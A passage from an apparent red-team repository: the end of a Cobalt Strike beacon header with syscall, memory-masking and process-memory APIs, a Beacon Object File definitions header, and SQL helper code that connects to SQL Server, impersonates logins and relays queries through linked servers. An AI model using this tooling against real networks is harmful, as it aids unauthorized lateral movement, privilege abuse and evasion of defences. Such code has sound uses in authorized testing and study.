 *                 The list is terminated by the HEAP_RECORD.ptr set to NULL.
 *  mask         - the mask that beacon randomly generated to apply
 *
 *  Added in version 4.10
 *  allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA
 *                     via a UDRL.
 */
typedef struct {
	unsigned int version;
	char  * sleep_mask_ptr;
	DWORD   sleep_mask_text_size;
	DWORD   sleep_mask_total_size;

	char  * beacon_ptr;
	HEAP_RECORD * heap_records;
	char    mask[MASK_SIZE];

	ALLOCATED_MEMORY allocatedMemory;
} BEACON_INFO, *PBEACON_INFO;

DECLSPEC_IMPORT BOOL   BeaconInformation(PBEACON_INFO info);

/* Key/Value store functions
 *    These functions are used to associate a key to a memory address and save
 *    that information into beacon.  These memory addresses can then be
 *    retrieved in a subsequent execution of a BOF.
 *
 *    key - the key will be converted to a hash which is used to locate the
 *          memory address.
 *
 *    ptr - a memory address to save.
 *
 * Considerations:
 *    - The contents at the memory address is not masked by beacon.
 *    - The contents at the memory address is not released by beacon.
 *
 */
DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr);
DECLSPEC_IMPORT void * BeaconGetValue(const char * key);
DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key);

/* Beacon Data Store functions
 *    These functions are used to access items in Beacon's Data Store.
 *    BeaconDataStoreGetItem returns NULL if the index does not exist.
 *
 *    The contents are masked by default, and BOFs must unprotect the entry
 *    before accessing the data buffer. BOFs must also protect the entry
 *    after the data is not used anymore.
 *
 */

#define DATA_STORE_TYPE_EMPTY 0
#define DATA_STORE_TYPE_GENERAL_FILE 1

typedef struct {
	int type;
	DWORD64 hash;
	BOOL masked;
	char* buffer;
	size_t length;
} DATA_STORE_OBJECT, *PDATA_STORE_OBJECT;

DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index);
DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries();

/* Beacon User Data functions */
DECLSPEC_IMPORT char * BeaconGetCustomUserData();

/* Beacon System call */
/* Syscalls API */
typedef struct
{
	PVOID fnAddr;
	PVOID jmpAddr;
	DWORD sysnum;
} SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY;

typedef struct
{
	SYSCALL_API_ENTRY ntAllocateVirtualMemory;
	SYSCALL_API_ENTRY ntProtectVirtualMemory;
	SYSCALL_API_ENTRY ntFreeVirtualMemory;
	SYSCALL_API_ENTRY ntGetContextThread;
	SYSCALL_API_ENTRY ntSetContextThread;
	SYSCALL_API_ENTRY ntResumeThread;
	SYSCALL_API_ENTRY ntCreateThreadEx;
	SYSCALL_API_ENTRY ntOpenProcess;
	SYSCALL_API_ENTRY ntOpenThread;
	SYSCALL_API_ENTRY ntClose;
	SYSCALL_API_ENTRY ntCreateSection;
	SYSCALL_API_ENTRY ntMapViewOfSection;
	SYSCALL_API_ENTRY ntUnmapViewOfSection;
	SYSCALL_API_ENTRY ntQueryVirtualMemory;
	SYSCALL_API_ENTRY ntDuplicateObject;
	SYSCALL_API_ENTRY ntReadVirtualMemory;
	SYSCALL_API_ENTRY ntWriteVirtualMemory;
	SYSCALL_API_ENTRY ntReadFile;
	SYSCALL_API_ENTRY ntWriteFile;
	SYSCALL_API_ENTRY ntCreateFile;
	SYSCALL_API_ENTRY ntQueueApcThread;
	SYSCALL_API_ENTRY ntCreateProcess;
	SYSCALL_API_ENTRY ntOpenProcessToken;
	SYSCALL_API_ENTRY ntTestAlert;
	SYSCALL_API_ENTRY ntSuspendProcess;
	SYSCALL_API_ENTRY ntResumeProcess;
	SYSCALL_API_ENTRY ntQuerySystemInformation;
	SYSCALL_API_ENTRY ntQueryDirectoryFile;
	SYSCALL_API_ENTRY ntSetInformationProcess;
	SYSCALL_API_ENTRY ntSetInformationThread;
	SYSCALL_API_ENTRY ntQueryInformationProcess;
	SYSCALL_API_ENTRY ntQueryInformationThread;
	SYSCALL_API_ENTRY ntOpenSection;
	SYSCALL_API_ENTRY ntAdjustPrivilegesToken;
	SYSCALL_API_ENTRY ntDeviceIoControlFile;
	SYSCALL_API_ENTRY ntWaitForMultipleObjects;
} SYSCALL_API, *PSYSCALL_API;

/* Additional Run Time Library (RTL) addresses used to support system calls.
 * If they are not set then system calls that require them will fall back
 * to the Standard Windows API.
 *
 * Required to support the following system calls:
 *    ntCreateFile
 */
typedef struct
{
	PVOID rtlDosPathNameToNtPathNameUWithStatusAddr;
	PVOID rtlFreeHeapAddr;
	PVOID rtlGetProcessHeapAddr;
} RTL_API, *PRTL_API;

/* Updated in version 4.11 to use the entire structure instead of pointers to the structure.
 * This allows for retrieving a copy of the information which would be under the BOF's
 * control instead of a reference pointer which may be obfuscated when beacon is sleeping.
 */
typedef struct
{
	SYSCALL_API syscalls;
	RTL_API     rtls;
} BEACON_SYSCALLS, *PBEACON_SYSCALLS;

/* Updated in version 4.11 to include the size of the info pointer, which equals sizeof(BEACON_SYSCALLS) */
DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, SIZE_T infoSize, BOOL resolveIfNotInitialized);

/* Beacon System call functions which will use the current system call method */
DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle);
DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId);
DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId);
DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object);
DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress);
DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length);
DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);

/* Beacon Gate APIs */
DECLSPEC_IMPORT VOID BeaconDisableBeaconGate();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGate();

DECLSPEC_IMPORT VOID BeaconDisableBeaconGateMasking();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGateMasking();

/* Beacon User Data
 *
 * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 * e.g. 0x040900 -> CS 4.9
 *      0x041000 -> CS 4.10
*/

#define DLL_BEACON_USER_DATA 0x0d
#define BEACON_USER_DATA_CUSTOM_SIZE 32
typedef struct
{
	unsigned int version;
	PSYSCALL_API syscalls;
	char         custom[BEACON_USER_DATA_CUSTOM_SIZE];
	PRTL_API     rtls;
	PALLOCATED_MEMORY allocatedMemory;
} USER_DATA, * PUSER_DATA;

#ifdef __cplusplus
}
#endif // __cplusplus
#endif // _BEACON_H_


================================================
FILE: AD-BOF/SQL-BOF/src/common/bofdefs.h
================================================
#pragma once
#pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen)
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <process.h>
#include <winternl.h>
#include <imagehlp.h>
#include <iphlpapi.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <windns.h>
#include <dbghelp.h>
#include <winldap.h>
#include <winnetwk.h>
#include <wtsapi32.h>
#include <shlwapi.h>
#include <odbcinst.h>
#include <sql.h>
#include <sqlext.h>

#ifdef _WIN32
#define STDCALL __stdcall
#else
#define STDCALL
#endif

#ifdef BOF

// KERNEL32
WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
WINBASEAPI int WINAPI KERNEL32$WideCharToMultiByte (UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds);


#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)

// MSVCRT
WINBASEAPI int __cdecl MSVCRT$atoi(const char *_Str);
WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements);
WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
WINBASEAPI int __cdecl MSVCRT$rand(void);
WINBASEAPI int __cdecl MSVCRT$srand(unsigned int _Seed);
WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strcat(char * __restrict__ _Dest,const char * __restrict__ _Source);
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2);
WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strncat(char * __restrict__ _Dest,const char * __restrict__ _Source,size_t _Count);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strncpy(char * __restrict__ _Dest,const char * __restrict__ _Source,size_t _Count);
WINBASEAPI time_t __cdecl MSVCRT$time(time_t *_Time);
WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src);

#define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size)

// ODBC32
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLAllocHandle(SQLSMALLINT HandleType, SQLHANDLE InputHandle, SQLHANDLE* OutputHandlePtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLCloseCursor(SQLHSTMT StatementHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLDescribeCol(SQLHSTMT StatementHandle, SQLUSMALLINT ColumnNumber, SQLCHAR* ColumnName, SQLSMALLINT BufferLength, SQLSMALLINT* NameLengthPtr, SQLSMALLINT* DataTypePtr, SQLULEN* ColumnSizePtr, SQLSMALLINT* DecimalDigitsPtr, SQLSMALLINT* NullablePtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLDisconnect(SQLHDBC ConnectionHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLDriverConnect(SQLHDBC ConnectionHandle, SQLHWND WindowHandle, SQLCHAR* InConnectionString, SQLSMALLINT StringLength1, SQLCHAR* OutConnectionString, SQLSMALLINT BufferLength, SQLSMALLINT* StringLength2Ptr, SQLUSMALLINT DriverCompletion);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLExecDirect(SQLHSTMT StatementHandle, SQLCHAR* StatementText, SQLINTEGER TextLength);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLFetch(SQLHSTMT StatementHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLFreeHandle(SQLSMALLINT HandleType, SQLHANDLE Handle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLGetData(SQLHSTMT StatementHandle, SQLUSMALLINT ColumnNumber, SQLSMALLINT TargetType, SQLPOINTER TargetValuePtr, SQLLEN BufferLength, SQLLEN* StrLen_or_IndPtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLGetDiagRec(SQLSMALLINT HandleType, SQLHANDLE Handle, SQLSMALLINT RecNumber, SQLCHAR* Sqlstate, SQLINTEGER* NativeErrorPtr, SQLCHAR* MessageText, SQLSMALLINT BufferLength, SQLSMALLINT* TextLengthPtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLNumResultCols(SQLHSTMT StatementHandle, SQLSMALLINT* ColumnCountPtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLMoreResults(SQLHSTMT StatementHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLSetEnvAttr(SQLHENV EnvironmentHandle, SQLINTEGER Attribute, SQLPOINTER ValuePtr, SQLINTEGER StringLength);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLSetStmtAttr(SQLHSTMT StatementHandle, SQLINTEGER Attribute, SQLPOINTER Value, SQLINTEGER StringLength);

//WS2_32
WINBASEAPI int STDCALL WS2_32$closesocket(SOCKET s);
WINBASEAPI u_short STDCALL WS2_32$htons(u_short hostshort);
WINBASEAPI int STDCALL WS2_32$inet_pton(int af, const char *src, void *dst);
WINBASEAPI int STDCALL WS2_32$recvfrom(SOCKET s, char *buf, int len, int flags, struct sockaddr *from, int *fromlen);
WINBASEAPI int STDCALL WS2_32$sendto(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen);
WINBASEAPI int STDCALL WS2_32$setsockopt(SOCKET s, int level, int optname, const char *optval, int optlen);
WINBASEAPI int STDCALL WS2_32$socket(int af, int type, int protocol);
WINBASEAPI int STDCALL WS2_32$WSACleanup();
WINBASEAPI int STDCALL WS2_32$WSAGetLastError();
WINBASEAPI int STDCALL WS2_32$WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData);

#else

#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)
#define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size)

// KERNEL32
#define KERNEL32$CloseHandle CloseHandle
#define KERNEL32$CreateThread CreateThread
#define KERNEL32$WideCharToMultiByte  WideCharToMultiByte
#define KERNEL32$HeapFree  HeapFree 
#define KERNEL32$GetProcessHeap GetProcessHeap
#define KERNEL32$HeapAlloc HeapAlloc
#define KERNEL32$WaitForSingleObject WaitForSingleObject


// MSVCRT
#define MSVCRT$atoi atoi
#define MSVCRT$calloc calloc
#define MSVCRT$free free
#define MSVCRT$malloc malloc
#define MSVCRT$memcpy memcpy
#define MSVCRT$memset memset
#define MSVCRT$rand rand
#define MSVCRT$srand srand
#define MSVCRT$sprintf sprintf
#define MSVCRT$strcat strcat
#define MSVCRT$strcmp strcmp
#define MSVCRT$strlen strlen
#define MSVCRT$strncat strncat
#define MSVCRT$strncpy strncpy
#define MSVCRT$time time
#define MSVCRT$vsnprintf vsnprintf
#define MSVCRT$strcpy strcpy

// ODBC32
#define ODBC32$SQLAllocHandle SQLAllocHandle
#define ODBC32$SQLCloseCursor SQLCloseCursor
#define ODBC32$SQLDescribeCol SQLDescribeCol
#define ODBC32$SQLDisconnect SQLDisconnect
#define ODBC32$SQLDriverConnect SQLDriverConnect
#define ODBC32$SQLExecDirect SQLExecDirect
#define ODBC32$SQLFetch SQLFetch
#define ODBC32$SQLFreeHandle SQLFreeHandle
#define ODBC32$SQLGetData SQLGetData
#define ODBC32$SQLGetDiagRec SQLGetDiagRec
#define ODBC32$SQLNumResultCols SQLNumResultCols
#define ODBC32$SQLMoreResults SQLMoreResults
#define ODBC32$SQLSetEnvAttr SQLSetEnvAttr
#define ODBC32$SQLSetStmtAttr SQLSetStmtAttr

//WS2_32
#define WS2_32$closesocket closesocket
#define WS2_32$htons htons
#define WS2_32$inet_pton inet_pton
#define WS2_32$recvfrom recvfrom
#define WS2_32$sendto sendto
#define WS2_32$setsockopt setsockopt
#define WS2_32$socket socket
#define WS2_32$WSACleanup WSACleanup
#define WS2_32$WSAGetLastError WSAGetLastError
#define WS2_32$WSAStartup WSAStartup

#endif


================================================
FILE: AD-BOF/SQL-BOF/src/common/sql.c
================================================
#include "bofdefs.h"
#include <sql.h>
#include <windows.h>

void ShowError(unsigned int handletype, const SQLHANDLE *handle) {
  SQLCHAR sqlstate[1024];
  SQLCHAR message[1024];
  if (SQL_SUCCESS == ODBC32$SQLGetDiagRec(handletype, (SQLHANDLE)handle, 1, sqlstate, NULL, message, 1024, NULL)) {
    internal_printf("[-] Message: %s \n[-] SQL State: %s\n", message, sqlstate);
  }
}

BOOL ExecuteQuery(SQLHSTMT stmt, SQLCHAR *query) {
  SQLRETURN ret = ODBC32$SQLExecDirect(stmt, query, SQL_NTS);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error executing query\n");
    ShowError(SQL_HANDLE_STMT, stmt);
    return FALSE;
  }
  return TRUE;
}

BOOL ExecuteLQueryRpc(SQLHSTMT stmt, SQLCHAR *query, char *link) {
  int count = 0;
  char *ptr = (char *)query;
  while (*ptr) {
    if (*ptr == '\'') {
      count++;
    }
    ptr++;
  }

  char *editedQuery = (char *)intAlloc( (MSVCRT$strlen((char *)query) + count + 1) * sizeof(char));
  char *newPtr = editedQuery;
  ptr = (char *)query;

  while (*ptr) {
    if (*ptr == '\'') {
      *newPtr++ = '\'';
      *newPtr++ = '\'';
    } else {
      *newPtr++ = *ptr;
    }
    ptr++;
  }
  *newPtr = '\0';

  char *prefix = "EXECUTE ('";
  char *suffix = "') AT [";
  char *querySuffix = "];";

  // append prefix, query, suffix, link, querySuffix
  size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen((char *)editedQuery) + MSVCRT$strlen(suffix) + MSVCRT$strlen(link) + MSVCRT$strlen(querySuffix) + 1;
  char *lQuery = (char *)intAlloc(totalSize * sizeof(char));
  MSVCRT$strcpy(lQuery, prefix);
  MSVCRT$strncat(lQuery, (char *)editedQuery, totalSize - MSVCRT$strlen(lQuery) - 1);
  MSVCRT$strncat(lQuery, suffix, totalSize - MSVCRT$strlen(lQuery) - 1);
  MSVCRT$strncat(lQuery, link, totalSize - MSVCRT$strlen(lQuery) - 1);
  MSVCRT$strncat(lQuery, querySuffix, totalSize - MSVCRT$strlen(lQuery) - 1);

  BOOL result = ExecuteQuery(stmt, (SQLCHAR *)lQuery);

  intFree(editedQuery);
  intFree(lQuery);

  return result;
}

BOOL ExecuteLQuery(SQLHSTMT stmt, SQLCHAR *query, char *link) {
  int count = 0;
  char *ptr = (char *)query;
  while (*ptr) {
    if (*ptr == '\'') {
      count++;
    }
    ptr++;
  }

  char *editedQuery = (char *)intAlloc( (MSVCRT$strlen((char *)query) + count + 1) * sizeof(char));
  char *newPtr = editedQuery;
  ptr = (char *)query;

  while (*ptr) {
    if (*ptr == '\'') {
      *newPtr++ = '\'';
      *newPtr++ = '\'';
    } else {
      *newPtr++ = *ptr;
    }
    ptr++;
  }
  *newPtr = '\0';

  char *linkPrefix = "SELECT * FROM OPENQUERY(\"";
  char *linksuffix = "\", '";
  char *querySuffix = "')";

  // append linkPrefix, link, linksuffix, query, querySuffix
  size_t totalSize = MSVCRT$strlen(linkPrefix) + MSVCRT$strlen(link) + MSVCRT$strlen(linksuffix) + MSVCRT$strlen((char *)editedQuery) + MSVCRT$strlen(querySuffix) + 1;
  char *lQuery = (char *)intAlloc(totalSize * sizeof(char));

  MSVCRT$strcpy(lQuery, linkPrefix);
  MSVCRT$strncat(lQuery, link, totalSize - MSVCRT$strlen(lQuery) - 1);
  MSVCRT$strncat(lQuery, linksuffix, totalSize - MSVCRT$strlen(lQuery) - 1);
  MSVCRT$strncat(lQuery, (char *)editedQuery, totalSize - MSVCRT$strlen(lQuery) - 1);
  MSVCRT$strncat(lQuery, querySuffix, totalSize - MSVCRT$strlen(lQuery) - 1);

  BOOL result = ExecuteQuery(stmt, (SQLCHAR *)lQuery);

  intFree(editedQuery);
  intFree(lQuery);

  return result;
}

BOOL ExecuteIQuery(SQLHSTMT stmt, SQLCHAR *query, char *impersonate) {
  char *prefix = "EXECUTE AS LOGIN = '";
  char *suffix = "'; ";

  // append prefix, impersonate, suffix and query
  size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(impersonate) + MSVCRT$strlen(suffix) + MSVCRT$strlen((char *)query) + 1;
  char *iQuery = (char *)intAlloc(totalSize * sizeof(char));
  MSVCRT$strcpy(iQuery, prefix);
  MSVCRT$strncat(iQuery, impersonate, totalSize - MSVCRT$strlen(iQuery) - 1);
  MSVCRT$strncat(iQuery, suffix, totalSize - MSVCRT$strlen(iQuery) - 1);
  MSVCRT$strncat(iQuery, (char *)query, totalSize - MSVCRT$strlen(iQuery) - 1);

  BOOL result = ExecuteQuery(stmt, (SQLCHAR *)iQuery);

  intFree(iQuery);

  return result;
}

BOOL HandleQuery(SQLHSTMT stmt, SQLCHAR *query, char *link, char *impersonate, BOOL useRpc) {
  if (link != NULL) {
    if (useRpc) {
      return ExecuteLQueryRpc(stmt, query, link);
    } else {
      return ExecuteLQuery(stmt, query, link);
    }
  } else if (impersonate != NULL) {
    return ExecuteIQuery(stmt, query, impersonate);
  } else {
    return ExecuteQuery(stmt, query);
  }
}

BOOL GetTableShema(SQLHSTMT stmt, char *link, char *database, char *table) {
  char *prefix = "SELECT TABLE_SCHEMA FROM ";
  char *middle = ".INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = '";
  char *suffix = "';";

  size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(database) + MSVCRT$strlen(middle) + MSVCRT$strlen(table) + MSVCRT$strlen(suffix) + 1;
  char *query = (char *)intAlloc(totalSize * sizeof(char));

  MSVCRT$strcpy(query, prefix);
  MSVCRT$strncat(query, database, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, middle, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, table, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

  BOOL result = ExecuteLQuery(stmt, (SQLCHAR *)query, link);

  intFree(query);

  return result;
}

void ClearCursor(SQLHSTMT stmt) {
  SQLRETURN ret = SQL_SUCCESS;

  while (ret == SQL_SUCCESS || ret == SQL_SUCCESS_WITH_INFO) {
    ODBC32$SQLFetch(stmt);
    ret = ODBC32$SQLMoreResults(stmt);
  }
}

BOOL UsingLinkAndImpersonate(char *link, char *impersonate) {
  if (link != NULL && impersonate != NULL) {
    internal_printf("[!] Cannot use both link and impersonate.\n");
    printoutput(TRUE);
    return TRUE;
  }

  // linked server usage will be printed in the individual BOFs
  if (impersonate != NULL) {
    internal_printf("[*] Using impersonation: %s\n", impersonate);
  }

  return FALSE;
}

char **GetMultipleResults(SQLHSTMT stmt, BOOL hasHeader) {
  char **results = (char **)intAlloc(1024 * sizeof(char *));
  SQLCHAR buf[1024];
  SQLLEN indicator;
  int i = 0;

  while (ODBC32$SQLFetch(stmt) == SQL_SUCCESS) {
    ODBC32$SQLGetData(stmt, 1, SQL_C_CHAR, buf, sizeof(buf), &indicator);
    if (hasHeader && i == 0) {
      i++;
      continue;
    }
    results[i] =
        (char *)intAlloc((MSVCRT$strlen((char *)buf) + 1) * sizeof(char));
    MSVCRT$strcpy(results[i], (char *)buf);
    i++;
  }
  results[i] = NULL; // Null terminate the array
  return results;
}

char *GetSingleResult(SQLHSTMT stmt, BOOL hasHeader) {
  SQLCHAR *buf = (SQLCHAR *)intAlloc(1024 * sizeof(SQLCHAR));
  SQLLEN indicator;
  SQLRETURN ret;

  ret = ODBC32$SQLFetch(stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error fetching results\n");
    return NULL;
  }

  ret = ODBC32$SQLGetData(stmt, 1, SQL_C_CHAR, buf, 1024, &indicator);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error retrieving data\n");
    return NULL;
  }

  if (hasHeader) {
    ret = ODBC32$SQLFetch(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Error fetching results\n");
      return NULL;
    }

    ret = ODBC32$SQLGetData(stmt, 1, SQL_C_CHAR, buf, 1024, &indicator);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Error retrieving data\n");
      return NULL;
    }
  }
  return (char *)buf;
}

BOOL PrintQueryResults(SQLHSTMT stmt, BOOL hasHeader) {
  SQLSMALLINT columns;
  SQLRETURN ret;

  // Get the number of columns in the result set
  ret = ODBC32$SQLNumResultCols(stmt, &columns);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("Error retrieving column count\n");
    return FALSE;
  }

  SQLCHAR buffer[1024];
  SQLSMALLINT columnNameLength, dataType, decimalDigits, nullable;
  SQLULEN columnSize;
  int totalLength = 0;

  // Print column headers
  if (hasHeader) {
    for (SQLSMALLINT i = 1; i <= columns; i++) {
      ret = ODBC32$SQLDescribeCol(stmt, i, buffer, sizeof(buffer), &columnNameLength, &dataType, &columnSize, &decimalDigits, &nullable);
      if (!SQL_SUCCEEDED(ret)) {
        internal_printf("Error retrieving column information.\n");
        return FALSE;
      }
      internal_printf("%s | ", buffer);
      totalLength += columnNameLength + 3;
    }

    internal_printf("\n");
    for (int i = 0; i < totalLength; i++) {
      internal_printf("-");
    }
    internal_printf("\n");
  }

  // Iterate over each row
  while (SQL_SUCCEEDED(ret = ODBC32$SQLFetch(stmt))) {
    // Iterate over each column
    for (SQLSMALLINT i = 1; i <= columns; i++) {
      SQLLEN indicator;
      // Retrieve column data
      ret = ODBC32$SQLGetData(stmt, i, SQL_C_CHAR, buffer, sizeof(buffer),
                              &indicator);
      if (SQL_SUCCEEDED(ret)) {
        // Print column data
        if (indicator == SQL_NULL_DATA)
          MSVCRT$strcpy((char *)buffer, "");
        internal_printf("%s | ", buffer);
      }
    }
    internal_printf("\n");
  }
}

SQLHDBC ConnectToSqlServerAuth(SQLHENV *env, char *server, char *dbName, char *user, char *password) {
  SQLRETURN ret;
  SQLCHAR connstr[1024];
  SQLHDBC dbc = NULL;

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, env);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[-] Error allocating environment handle\n");
    ShowError(SQL_HANDLE_ENV, *env);
    return NULL;
  }

  ret = ODBC32$SQLSetEnvAttr(*env, SQL_ATTR_ODBC_VERSION,
                             (SQLPOINTER)SQL_OV_ODBC3, 0);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[-] Error setting ODBC version\n");
    ShowError(SQL_HANDLE_ENV, *env);
    return NULL;
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_DBC, *env, &dbc);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[-] Error allocating connection handle\n");
    ShowError(SQL_HANDLE_ENV, *env);
    return NULL;
  }

  if (user != NULL && password != NULL) {
    // SQL authentication
    if (dbName == NULL) {
      MSVCRT$sprintf((char *)connstr, "DRIVER={SQL Server};SERVER=%s;UID=%s;PWD=%s;", server, user, password);
    } else {
      MSVCRT$sprintf((char *)connstr, "DRIVER={SQL Server};SERVER=%s;DATABASE=%s;UID=%s;PWD=%s;", server, dbName, user, password);
    }
    internal_printf("[*] Using SQL authentication as '%s'\n", user);
  } else {
    // Windows integrated authentication
    if (dbName == NULL) {
      MSVCRT$sprintf((char *)connstr, "DRIVER={SQL Server};SERVER=%s;Trusted_Connection=Yes;", server);
    } else {
      MSVCRT$sprintf( (char *)connstr, "DRIVER={SQL Server};SERVER=%s;DATABASE=%s;Trusted_Connection=Yes;", server, dbName);
    }
  }

  internal_printf("[*] Connecting to %s:1433\n", server);
  ret = ODBC32$SQLDriverConnect(dbc, NULL, connstr, SQL_NTS, NULL, 0, NULL, SQL_DRIVER_NOPROMPT);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[-] Error connecting to database\n");
    ShowError(SQL_HANDLE_DBC, dbc);
    return NULL;
  }

  internal_printf("[+] Successfully connected to database\n");
  return dbc;
}

